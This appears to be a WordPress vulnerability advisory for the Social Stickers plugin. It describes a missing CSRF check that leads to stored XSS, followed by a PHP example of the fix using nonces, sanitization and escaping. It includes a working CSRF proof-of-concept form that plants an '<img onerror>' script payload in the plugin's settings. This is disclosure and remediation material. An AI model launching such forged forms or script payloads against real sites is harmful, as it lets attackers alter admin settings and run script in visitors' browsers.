The plugin does not have CSRF checks in place when updating its Social Network settings, and does not escape some of these fields, which could allow attackers to make a logged-in admin change them and lead to Stored Cross-Site Scripting issues.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=social-stickers%2Fsocial-stickers.php&tab=social_networks" method="POST">
      <input type="hidden" name="aim" value="" />
      <input type="hidden" name="behance" value="hello "><img src=x onerror=alert(9)>" />
      <input type="hidden" name="bebo" value="" />
      <input type="hidden" name="blogger" value="" />
      <input type="hidden" name="delicious" value="" />
      <input type="hidden" name="designfloat" value="" />
      <input type="hidden" name="deviantart" value="" />
      <input type="hidden" name="digg" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="flickr" value="" />
      <input type="hidden" name="facebook" value="" />
      <input type="hidden" name="googleplus" value="" />
      <input type="hidden" name="lastfm" value="" />
      <input type="hidden" name="linkedin" value="" />
      <input type="hidden" name="myspace" value="" />
      <input type="hidden" name="newsvine" value="" />
      <input type="hidden" name="picasa" value="" />
      <input type="hidden" name="posterous" value="" />
      <input type="hidden" name="rss" value="" />
      <input type="hidden" name="qik" value="" />
      <input type="hidden" name="slashdot" value="" />
      <input type="hidden" name="skype" value="" />
      <input type="hidden" name="stumbleupon" value="" />
      <input type="hidden" name="tumblr" value="" />
      <input type="hidden" name="twitter" value="" />
      <input type="hidden" name="vimeo" value="" />
      <input type="hidden" name="youtube" value="" />
      <input type="hidden" name="wordpress" value="" />
      <input type="hidden" name="Submit" value="Update usernames" />
      <input type="hidden" name="social-stickers-settings-submit" value="Y" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
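As an added illustration, not the Social Stickers plugin's own code, the settings-handler pattern that closes both gaps described above: a capability check plus WordPress nonce verification before saving (the CSRF fix), sanitization of the posted usernames, and attribute escaping when saved values are rendered back into the form (the stored XSS fix). The `ss_demo_` function prefix, the option name and the nonce action are assumptions; the field names are taken from the proof-of-concept form.

```php
<?php
// Hypothetical hardened "Social Network usernames" settings page.
// Added example; option name, nonce action and function names are assumed.

// Field names taken from the PoC form; only known networks are saved.
$ss_demo_networks = array( 'aim', 'behance', 'facebook', 'twitter', 'youtube' );

function ss_demo_save_settings( array $networks ) {
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // 2. CSRF check: dies unless a valid nonce for this action was posted.
    //    A form hosted on another origin cannot obtain this nonce value.
    check_admin_referer( 'ss_demo_save_networks', 'ss_demo_nonce' );

    $clean = array();
    foreach ( $networks as $name ) {
        // 3. Sanitize on input: strips tags and control characters, so a
        //    value such as "><img src=x onerror=...> is not stored as-is.
        $clean[ $name ] = isset( $_POST[ $name ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $name ] ) )
            : '';
    }
    update_option( 'ss_demo_social_networks', $clean );
}

function ss_demo_render_form( array $networks ) {
    $saved = get_option( 'ss_demo_social_networks', array() );
    echo '<form method="post">';
    // Emits the hidden nonce field that check_admin_referer() validates.
    wp_nonce_field( 'ss_demo_save_networks', 'ss_demo_nonce' );
    foreach ( $networks as $name ) {
        $value = isset( $saved[ $name ] ) ? $saved[ $name ] : '';
        // 4. Escape on output: esc_attr() encodes quotes and angle brackets,
        //    so even a previously stored payload cannot break out of value="".
        printf(
            '<label>%1$s <input type="text" name="%1$s" value="%2$s"></label><br>',
            esc_attr( $name ),
            esc_attr( $value )
        );
    }
    echo '<input type="submit" name="social-stickers-settings-submit" value="Update usernames">';
    echo '</form>';
}

if ( isset( $_POST['social-stickers-settings-submit'] ) ) {
    ss_demo_save_settings( $ss_demo_networks );
}
ss_demo_render_form( $ss_demo_networks );
```

Run inside a WordPress admin page callback; with the nonce check in place, the proof-of-concept form above fails at `check_admin_referer()` before any option is written.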
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Vinay Varma Mudunuri
Yes
2022-04-20 (about 2 months ago)
2022-04-20 (about 2 months ago)
2022-04-21 (about 2 months ago)